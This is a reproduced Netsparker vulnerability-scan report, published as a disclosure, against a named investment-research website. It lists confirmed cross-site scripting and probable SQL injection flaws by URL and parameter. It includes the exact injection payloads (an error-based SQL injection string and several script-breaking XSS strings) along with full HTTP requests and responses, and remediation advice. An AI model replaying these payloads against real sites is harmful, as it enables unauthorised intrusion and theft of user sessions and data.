SQL Injection, Stored XSS, DORK, Insecure COnfiguration, www.stansberryresearch.com

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Loading



Netsparker - Scan Report Summary
TARGET URL
http://www.stansberryresearch.com/pro/1108PSI...
SCAN DATE
11/4/2011 12:36:10 AM
REPORT DATE
11/4/2011 10:31:29 AM
SCAN DURATION
00:31:08

Total Requests

Average Speed

req/sec.
54
identified
38
confirmed
1
critical
8
informational

SCAN SETTINGS

Scan Settings
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
CRITICAL
2 %
IMPORTANT
67 %
MEDIUM
4 %
LOW
13 %
INFORMATION
15 %

VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
/BackUp/ICA_Intelligenes/ Internal Server Error Yes
/contact.asp E-mail Address Disclosure No
/forms/palConference.asp address2 POST Cross-site Scripting Yes
city POST Cross-site Scripting Yes
state_ POST Cross-site Scripting Yes
zip POST Cross-site Scripting Yes
country POST Cross-site Scripting Yes
phone POST Cross-site Scripting Yes
email POST Cross-site Scripting Yes
gfirstname POST Cross-site Scripting Yes
glastname POST Cross-site Scripting Yes
inDate POST Cross-site Scripting Yes
outDate POST Cross-site Scripting Yes
address1 POST Cross-site Scripting No
requests POST Cross-site Scripting No
Permanent Cross-site Scripting Yes
[Possible] Permanent Cross-site Scripting No
requests POST [Possible] Cross-site Scripting No
[Possible] Internal Path Leakage (Windows) No
/ICA/default.aspx username POST ASP.NET Stack Trace Disclosure No
/ICA/Default.aspx ASP.NET Version Disclosure No
/ICA/ForgotPassword.aspx email POST Cross-site Scripting Yes
MAC is not Enabled in ViewState No
ViewState is not Encrypted No
/onlinevideo/ Basic Authorisation over Clear Text Yes
/privacy.asp Password Transmitted Over HTTP Yes
Auto Complete Enabled Yes
/pro/1108PSINEWVD/6PSIMA21/PR Cookie Not Marked As HttpOnly Yes
IIS Version Disclosure No
/pro/images/ Forbidden Resource Yes
/pro/special/0712PWAORISP.asp list GET Cross-site Scripting Yes
lead GET Cross-site Scripting Yes
/PT/SubscriberPortfolio.asp portfolioId GET Cross-site Scripting Yes
guid GET Cross-site Scripting Yes
/pub/digest/archive/2007/html/20070808_Digest.asp [Possible] Internal Path Leakage (*nix) No
/pub/digest/archive/index.asp Permanent Cross-site Scripting Yes
/pub/div/ Permanent Cross-site Scripting Yes
/pub/div/index.asp Permanent Cross-site Scripting Yes
/pub/fda/ Permanent Cross-site Scripting Yes
/pub/gld/ Permanent Cross-site Scripting Yes
/pub/gld/index.asp Permanent Cross-site Scripting Yes
/pub/mdp/ Permanent Cross-site Scripting Yes
/pub/pal/ Permanent Cross-site Scripting Yes
/pub/pwa/ Permanent Cross-site Scripting Yes
/pub/sug/ Permanent Cross-site Scripting Yes
/responses/forgot_password.asp Permanent Cross-site Scripting Yes
/responses/sign_in_error.asp Query Based QUERYSTRING Cross-site Scripting Yes
Permanent Cross-site Scripting Yes
/responses/system_error.asp Permanent Cross-site Scripting Yes
/robots.txt Robots.txt Identified Yes
[Possible] Internal Path Leakage (*nix) No
/sitemap.xml Sitemap Identified No
/stp_ircs/feedback/pal_registration.asp hotel POST [Probable] SQL Injection No
hotel POST Database Error Message No
[Probable] SQL Injection

[Probable] SQL Injection

1 TOTAL
CRITICAL
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Even though Netsparker believes that there is a SQL Injection in here it could not confirm it. There can be numerous reasons for Netsparker not being able to confirm this. We strongly recommend investigating the issue manually to ensure that it is an SQL Injection and that it needs to be addressed. You can also consider sending the details of this issue to us, in order that we can address this issue for the next time and give you a more precise result.

Impact

Depending on the backend database, database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
  • Reading, Updating and Deleting arbitrary data from the database
  • Executing commands on the underlying operating system
  • Reading, Updating and Deleting arbitrary tables from the database

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL) within the architecture consider its benefits and implement if appropriate. As a minimum the use of s DAL will help centralize the issue and its resolution. You can also use an ORM (object relational mapping). Most ORM systems use parameterized queries and this can solve many if not all SQL Injection based problems.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries)
  4. Monitor and review weblogs and application logs in order to uncover active or previous exploitation attempts.

Remedy

A very robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to test for SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

External References

Remedy References

Classification

OWASP A1 PCI v1.2-6.5.2 PCI v2.0-6.5.1 CWE-89 CAPEC-66 WASC-19
- /stp_ircs/feedback/pal_registration.asp

/stp_ircs/feedback/pal_registration.asp

http://www.stansberryresearch.com/stp_ircs/feedback/pal_registration.asp

Parameters

Parameter Type Value
title POST 3
firstname POST Smith
lastname POST Smith
address1 POST 3
address2 POST 3
city POST 3
state_ POST 3
zip POST 3
country POST 3
phone POST 3
email POST netsparker@example.com
reEmail POST netsparker@example.com
contact POST phone
gfirstname POST Smith
glastname POST Smith
hotel POST (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
inDate POST 3
outDate POST 3
requests POST 3
Submit POST Submit Reservation

Request

POST /stp_ircs/feedback/pal_registration.asp HTTP/1.1
Referer: http://www.stansberryresearch.com/forms/palConference.asp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=KMAOLMLBPDNLHDCIBGFLFLKE; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=MLGBMFABFCAOIKGNAJPIIIPK; Overseas+0611=Overseas+0611; RDB=c803000000000000002d2d2d2d2d2d2d2d2d2d2d2d2d2d2d00000000000000000000000000
Content-Length: 539
Expect: 100-continue
Accept-Encoding: gzip, deflate

title=3&firstname=Smith&lastname=Smith&address1=3&address2=3&city=3&state_=3&zip=3&country=3&phone=3&email=netsparker%40example.com&reEmail=netsparker%40example.com&contact=phone&gfirstname=Smith&glastname=Smith&hotel=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&inDate=3&outDate=3&requests=3&Submit=Submit+Reservation

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 04 Nov 2011 05:50:39 GMT
Server: Microsoft-IIS/6.0
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Content-Length: 632
Content-Type: text/html
Cache-control: private





<!-- Declaring Variables -->
<font face="Arial" size=2><p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e07'</font><p><font face="Arial" size=2>Conversion failed when converting the varchar value '(select 1 and row(1,1)&gt;(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))' to data type int.</font><p><font face="Arial" size=2>/stp_ircs/feedback/pal_registration.asp</font><font face="Arial" size=2>, line 94</font>
Cross-site Scripting

Cross-site Scripting

19 TOTAL
IMPORTANT
CONFIRMED
17
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hi-jacking users' active session
  • Changing the look of the page within the victims browser.
  • Mounting a successful phishing attack.
  • Intercept data and perform man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

Classification

OWASP A2 PCI v1.2-6.5.1 PCI v2.0-6.5.7 CWE-79 CAPEC-19 WASC-08
- /responses/sign_in_error.asp

/responses/sign_in_error.asp CONFIRMED

http://www.stansberryresearch.com/responses/sign_in_error.asp?'%22--%3E%3C/style%3E%3C/script%3E%3Cs..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x002420)</script>

Request

GET /responses/sign_in_error.asp HTTP/1.1
Referer: http://www.stansberryresearch.com/secure/editors.asp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=PNONLMLBJOBLEPMOAPIFLJAA; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=PKFBMFABOJPNJBEAPBIOEOCJ
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 04 Nov 2011 05:44:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Content-Length: 12180
Content-Type: text/html
Cache-control: private



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Stansberry & Associates Investment Research</title>
<link rel="stylesheet" href="/includes/css.css" type="text/css" />
</head>

<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<SCRIPT LANGUAGE="JavaScript" src="http://oascentral.stansberryresearch.com/Scripts/oas_analytics.js"></SCRIPT>
<script language="JavaScript">
var RN = new String (Math.random());
var RNS = RN.substring (2,11);
var oas_jx_sitepage = "stansberry/cover";
//<!�- Define Custom Reporting Taxonomy, format is: '&Attribute1=Value1&Attribute2=Value2' -->
var OAS_taxonomy='custom=' + oas_jx_sitepage;
var OAS_query='';
OAS_query += 'XE' + '&' + OAS_taxonomy + OAS_rdl + "&if_nt_CookieAccept=" + OAS_CA + '&XE';
// -->
</script>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td width="427" rowspan="2"><a href="/"><img src="/images/top_logo.gif" alt="Stansberry & Associates Investment Research" width="427" height="103" border="0"></a></td>
<td width="360" height="82" align="right" valign="middle"><a href="http://signups.harborpublishing.com/fsm/signups/signup/538.html" target="_new"><img src="/images/stars_arrow.gif" border="0"></a></td>
<td width="13" align="right" valign="middle">&nbsp;</td>
</tr>
<tr>
<td colspan="2" align="right" valign="bottom"><table width="100%" border="0" align="center" cellpadding="3" cellspacing="0" class="top_font">
<tr>
<td align="right" valign="bottom"><div align="right">Customer Service: 1-888-261-2693 | <a href="/website_overview.asp" target="_blank">Website Overview</a></div></td>
<td width="6" align="right" valign="bottom">&nbsp;</td>
</tr>
</table></td>
</tr>
</table>
<table width="798" border="0" align="center" cellpadding="0" cellspacing="0">
<tr align="left" valign="top">
<td><div align="left"><a href="/"><img src="/images/home_button.gif" alt="Home" width="70" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/editors.asp"><img src="/images/editors_button.gif" alt="Meet The Editors" width="129" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/products.asp"><img src="/images/products_btn.gif" alt="In The News" width="112" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/schedule.asp"><img src="/images/pubsched_button.gif" alt="Investment Research Publishing Schedule" width="155" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/contact.asp"><img src="/images/contact_button_main.gif" alt="Contact Us" width="159" height="38" border="0"></a></div></td>
<td><div align="left"><img src="/images/login_button.gif" alt="Subscriber Login" width="173" height="38" border="0"></div></td>
</tr>
</table><script language="javascript" type="text/javascript">
// <!CDATA[

function Submit1_onclick() {

}

// ]]>
</script>



<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>
<table width="625" border="0" cellpadding="0" cellspacing="0">
<tr>
<td><script language="JavaScript">
<!--
var oas_jx_pos = "Top";
document.write("<scr" + "ipt language=\"JavaScript\" src=\"http://oascentral.stansberryresearch.com/RealMedia/ads/adstream_jx.ads/" +
oas_jx_sitepage + "/1" + RNS + "@" + oas_jx_pos + '?' + OAS_query + "\"></scr" + "ipt>");
// -->
</script></td>
</tr>
</table></td>
<td width="200" align="left" valign="middle"><table width="100%" border="0" cellpadding="5" cellspacing="0">
<tr>
<td><!--<form action="/ICA/Default.aspx" method="post">-->
<!-- <form action="/test1/Default.aspx" method="post">-->
<form action="/ICA/default.aspx" method="post">
<table width="100%" border="0" align="right" cellpadding="2" cellspacing="0" class="top_font">
<tr>
<td >User Name:
<input name="username" type="text" id="username" size="22"></td>
</tr>
<tr>
<td>Password:
<input name="password" type="password" id="password" size="22">
<input name="ref" type="hidden" value="/secure/editors/'"--></style></script><script>netsparker(0x002420)</script>">
</td>
</tr>
<tr>
<td ><div align="left">
<p><input name="Submit" type="submit" class="top_font" value="Login" id="Submit1" onclick="return Submit1_onclick()">
<a href="/responses/forgot_password.asp">Forgot Password?</a></p>
</div></td>
</tr>
</table>
</form></td>
</tr>
</table></td>
</tr>
</table>
<TABLE id=main cellSpacing=0 cellPadding=3 width=800 align=center
bgColor=#ffffff>
<TBODY>
<TR>
<TD vAlign=top align=left height=21><DIV align=center>
<DIV align=center>
<DIV align=left>
<DIV align=left>
<DIV align=left>
<hr align="center" width="775" size="1" noshade>
<div align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif"
size=2></FONT></div>
</DIV>
</DIV>
</DIV>
</DIV>
</DIV></TD>
</TR>
</TBODY>
</TABLE>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>

<div align="center">
<P align=center class="mid_font"><B>Please Log In </B></P>
<table width="42%" border="0" cellspacing="0" cellpadding="2">
<tr align="left" valign="top">
<td><u><span class="mid_font"><FONT color=#990000><FONT
color=#666666><font color="#000000"><B>Remember:</B></font></FONT></FONT></span></u></td>
</tr>

</table>
<P align=center class="mid_font">You must have an S&amp;A subscription to access this section. <BR>
To learn more about our publications, visit our <a href="/">home page</a>. </P>
<P align=center class="mid_font">If you are already a subscriber, check your user name and password and try logging in again. <br>
Or contact customer service at 1-888-261-2693.<font color="#FF0000"><strong> </strong></font></P>
<P align=center class="mid_font">Thank you.</P>
<P align=center class="mid_font"><FONT color=#990000><B><FONT
color=#666666><BR>
</FONT></B></FONT></P>
</div>

</td>
</tr>
</table>
<TABLE cellSpacing=0 cellPadding=3 width=800 align=center
bgColor=#ffffff>
<TBODY>
<TR>
<TD vAlign=top align=left height=21><DIV align=center>
<DIV align=center>
<DIV align=left>
<DIV align=left>
<DIV align=left>
<div align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif"
size=2><img src="/images/bottom_border.gif" width="798" height="24"></FONT></div>
</DIV>
</DIV>
</DIV>
</DIV>
</DIV></TD>
</TR>
</TBODY>
</TABLE>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0" id="main">
<tr>
<td align="left" valign="top"><font color="#666666" size="1" face="Verdana, Arial, Helvetica, sans-serif">&copy;2011 Stansberry & Associates Investment Research. All Rights Reserved. Protected by copyright laws of the United States and international treaties. This website may only be used pursuant to the subscription agreement and any reproduction, copying, or redistribution (electronic or otherwise, including on the world wide web), in whole or in part, is strictly prohibited without the express written permission of Stansberry & Associates Investment Research, LLC. 1217 Saint Paul Street, Baltimore MD 21202. </font> </td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF" id="main">
<tr>
<td height="21" align="left" valign="top"><div align="center">
<div align="center">
<div align="left">
<DIV align=left>
<DIV align=left>
<hr width="800" size="1" noshade>
</DIV>
</DIV>
</div>
</div>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="left" valign="top"><div align="center">
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/">Home</a> | <a href="/editors.asp">Meet the Editors</a> | <a href="/news.asp">News & Events</a> | <a href="http://www.stansberryresearch.com/pub/psi/free_reports.html" target="_blank">Media &amp; Interviews</a> | <a href="/schedule.asp">Publishing Schedule</a> | <a href="/contact.asp">Contact Us</a> | <a href="/customer_service.asp">Customer Service</a><a href="/privacy.asp"><br>
</a> <a href="/pub/pal">The S&A Alliance</a> | <a href="/pub/sug">True Wealth Alliance</a> | <a href="/pub/pwa">Private Wealth Alliance</a> <br>
<a href="/pub/digest/">S&amp;A Digest</a> | <a href="http://www.dailywealth.com" target="_blank" title="DailyWealth Investment Newsletter">DailyWealth</a> | <a href="http://www.growthstockwire.com" target="_blank" title="Growth Stock Wire Investment Newsletter">Growth Stock Wire</a> | <a href="http://www.thedailycrux.com/" target="_blank">The Daily Crux<br />
</a></font><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/privacy.asp">Privacy Policy</a><br>
</font></p>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF" id="main">
<tr>
<td height="21" align="left" valign="top"><div align="center">
<div align="center">
<div align="left">
<DIV align=left>
<DIV align=left>
<hr align="center" width="300" size="1" noshade>
</DIV>
</DIV>
</div>
</div>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td height="21" align="left" valign="top"><div align="center"><a href="/"><strong><img src="/images/sa_logo.gif" alt="Stansberry & Associates Investment Research" width="198" height="39" border="0"></strong></a></div></td>
</tr>
</table>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
var pageTracker = _gat._getTracker("UA-235360-4");
pageTracker._initData();
pageTracker._trackPageview();
</script>

<!-- Google Code for S&amp;A Remarketing List -->
<script type="text/javascript">
/* <![CDATA[ */
var google_conversion_id = 1068007774;
var google_conversion_language = "en";
var google_conversion_format = "3";
var google_conversion_color = "666666";
var google_conversion_label = "AVdACPaJ0QEQ3oKi_QM";
var google_conversion_value = 0;
/* ]]> */
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
<noscript>
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1068007774/?label=AVdACPaJ0QEQ3oKi_QM&amp;guid=ON&amp;script=0"/>
</div>
</noscript>
<!-- Advertiser 'Stansberry & Associates', Include user in segment '2011 DWP - Stansberry Retargeting Pixel' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<img src="http://ads.bluelithium.com/pixel?id=1539896&t=2" width="1" height="1" />
<!-- End of segment tag -->
</body>
</html>
- /ICA/ForgotPassword.aspx

/ICA/ForgotPassword.aspx CONFIRMED

http://www.stansberryresearch.com/ICA/ForgotPassword.aspx

Parameters

Parameter Type Value
email POST ' stYle='x:expre/**/ssion(alert(9))
Submit POST Submit

Request

POST /ICA/ForgotPassword.aspx HTTP/1.1
Referer: http://www.stansberryresearch.com/responses/forgot_password.asp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=PBAOLMLBLAOGFFOELCCOEMHM; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=CDGBMFABKFKGIKOPGAIGEPEO; Overseas+0611=Overseas+0611; RDB=c803000000000000002d2d2d2d2d2d2d2d2d2d2d2d2d2d2d000000000000c55c000000000000
Content-Length: 69
Expect: 100-continue
Accept-Encoding: gzip, deflate

email='+stYle%3d'x%3aexpre%2f**%2fssion(netsparker(9))+&Submit=Submit

Response

HTTP/1.1 200 OK
Date: Fri, 04 Nov 2011 05:49:03 GMT
Server: Microsoft-IIS/6.0
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 277


<html><head></head><body onload='document.form1.submit()'><form name='form1' method='post' action='http://www.stansberryresearch.com/responses/forgot_password.asp' ><input name='email_request' type='hidden' value='' stYle='x:expre/**/ssion(netsparker(9))'></form></body></html>
- /PT/SubscriberPortfolio.asp

/PT/SubscriberPortfolio.asp CONFIRMED

http://www.stansberryresearch.com/PT/SubscriberPortfolio.asp?portfolioId='%22--%3E%3C/style%3E%3C/sc..

Parameters

Parameter Type Value
portfolioId GET '"--></style></script><script>alert(0x003ED9)</script>
guid GET 3

Request

GET /PT/SubscriberPortfolio.asp?portfolioId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003ED9)%3C/script%3E&guid=3 HTTP/1.1
Referer: http://www.stansberryresearch.com/PT/SubscriberPortfolio.asp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=EFAOLMLBDFGNKAKDFAPFBEJJ; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=FFGBMFABKIDINMJGOGCOPFLL; Overseas+0611=Overseas+0611; RDB=c803000000000000002d2d2d2d2d2d2d2d2d2d2d2d2d2d2d000000000000c55c000000000000
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 04 Nov 2011 05:49:33 GMT
Server: Microsoft-IIS/6.0
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Content-Length: 1490
Content-Type: text/html
Cache-control: private



<html xmlns="http://www.w3.org/1999/xhtml" >
<head runat="server">
<title>Subscriber Portfolio</title>
<link href="includes/css/ext2.0.2/ext-all.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="includes/js/ext2.0.2/ext-base.js"></script>
<script type="text/javascript" src="includes/js/ext2.0.2/ext-all.js"></script>
<script type="text/javascript" src="includes/js/Subscriber/SubscriberDataLoader.js"></script>
<script type="text/javascript" src="includes/js/Subscriber/SubscriberPortfolioObject.js"></script>
<style type="text/css">
.icon-grid {
background-image:url(includes/images/grid.png) !important;
}
</style>
<script type="text/javascript">
Ext.BLANK_IMAGE_URL = 'includes/images/ext2.0.2/themes/default/s.gif';
var subscriberPortfolio;
Ext.onReady(function(){
if (subscriberPortfolio == undefined) {
subscriberPortfolio = new SubscriberPortfolioObject();
subscriberPortfolio.tradeGrid.render();
}
});
</script>
</head>
<body>
<form id="form1" runat="server">
<input runat="server" type="hidden" id="portfolioId" name="portfolioId" id="portfolioId" value="'"--></style></script><script>netsparker(0x003ED9)</script>" />
<input runat="server" type="hidden" id="guid" name="guid" id="guid" value="3"/>
<div id="tradeGrid" />
</form>
</body>
</html>
- /PT/SubscriberPortfolio.asp

/PT/SubscriberPortfolio.asp CONFIRMED

http://www.stansberryresearch.com/PT/SubscriberPortfolio.asp?portfolioId=3&guid='%22--%3E%3C/style%3..

Parameters

Parameter Type Value
portfolioId GET 3
guid GET '"--></style></script><script>alert(0x003FA3)</script>

Request

GET /PT/SubscriberPortfolio.asp?portfolioId=3&guid='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003FA3)%3C/script%3E HTTP/1.1
Referer: http://www.stansberryresearch.com/PT/SubscriberPortfolio.asp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=FHAOLMLBJHICKPMLJNOGELPJ; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=LGGBMFABEFAEJIAGJLKBDAJJ; Overseas+0611=Overseas+0611; RDB=c803000000000000002d2d2d2d2d2d2d2d2d2d2d2d2d2d2d000000000000c55c000000000000
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 04 Nov 2011 05:49:49 GMT
Server: Microsoft-IIS/6.0
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Content-Length: 1490
Content-Type: text/html
Cache-control: private



<html xmlns="http://www.w3.org/1999/xhtml" >
<head runat="server">
<title>Subscriber Portfolio</title>
<link href="includes/css/ext2.0.2/ext-all.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="includes/js/ext2.0.2/ext-base.js"></script>
<script type="text/javascript" src="includes/js/ext2.0.2/ext-all.js"></script>
<script type="text/javascript" src="includes/js/Subscriber/SubscriberDataLoader.js"></script>
<script type="text/javascript" src="includes/js/Subscriber/SubscriberPortfolioObject.js"></script>
<style type="text/css">
.icon-grid {
background-image:url(includes/images/grid.png) !important;
}
</style>
<script type="text/javascript">
Ext.BLANK_IMAGE_URL = 'includes/images/ext2.0.2/themes/default/s.gif';
var subscriberPortfolio;
Ext.onReady(function(){
if (subscriberPortfolio == undefined) {
subscriberPortfolio = new SubscriberPortfolioObject();
subscriberPortfolio.tradeGrid.render();
}
});
</script>
</head>
<body>
<form id="form1" runat="server">
<input runat="server" type="hidden" id="portfolioId" name="portfolioId" id="portfolioId" value="3" />
<input runat="server" type="hidden" id="guid" name="guid" id="guid" value="'"--></style></script><script>netsparker(0x003FA3)</script>"/>
<div id="tradeGrid" />
</form>
</body>
</html>
- /pro/special/0712PWAORISP.asp

/pro/special/0712PWAORISP.asp CONFIRMED

http://www.stansberryresearch.com/pro/special/0712PWAORISP.asp?list=%22%3E%3Cscript%3Ealert(9)%3C/sc..

Parameters

Parameter Type Value
list GET "><script>alert(9)</script>
lead GET o

Request

GET /pro/special/0712PWAORISP.asp?list=%22%3E%3Cscript%3Enetsparker(9)%3C/script%3E&lead=o HTTP/1.1
Referer: http://www.stansberryresearch.com/pub/holiday/20071227SP.asp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=FOAOLMLBDGPHPICICACANMII; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=INGBMFABNPAKOIFCPJOOLOPM; Overseas+0611=Overseas+0611; RDB=c803000000000000002d2d2d2d2d2d2d2d2d2d2d2d2d2d2d00000000000000000000000000
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 04 Nov 2011 05:51:00 GMT
Server: Microsoft-IIS/6.0
